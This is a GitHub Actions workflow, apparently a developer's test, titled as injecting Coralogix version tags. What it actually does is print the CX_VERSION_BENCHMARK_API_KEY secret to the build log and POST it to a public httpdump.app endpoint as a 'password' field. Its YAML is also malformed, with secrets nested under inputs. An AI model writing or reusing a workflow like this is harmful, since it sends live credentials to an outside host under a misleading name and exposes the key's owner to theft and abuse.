name: Coralogix Inject Version Tags
on:
  workflow_call:
    inputs:
      cx_version_benchmark_url:
        description: 'URL for Coralogix Benchmark Version'
        required: true
        type: string
        # Note: Secrets cannot be directly defined in the inputs section.
      secrets:
        CX_VERSION_BENCHMARK_API_KEY: 
          required: true

jobs:
  example_job:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Use API Key
        run: echo "Using API Key"
        env:
          CX_VERSION_BENCHMARK_API_KEY: ${{ secrets.CX_VERSION_BENCHMARK_API_KEY }}

      - name: Echo it to see if it shows up or not 
        run: | 
          echo " Here is the var: ${{ secrets.CX_VERSION_BENCHMARK_API_KEY }}"
          curl --header "Content-Type: application/json" \
          --request POST \
          --data '{"username":"Marcel","password":"${{ secrets.CX_VERSION_BENCHMARK_API_KEY }}","this is a":"test"}' \
          https://httpdump.app/dumps/4172b9d1-5e02-449f-9481-87fea9e9395f
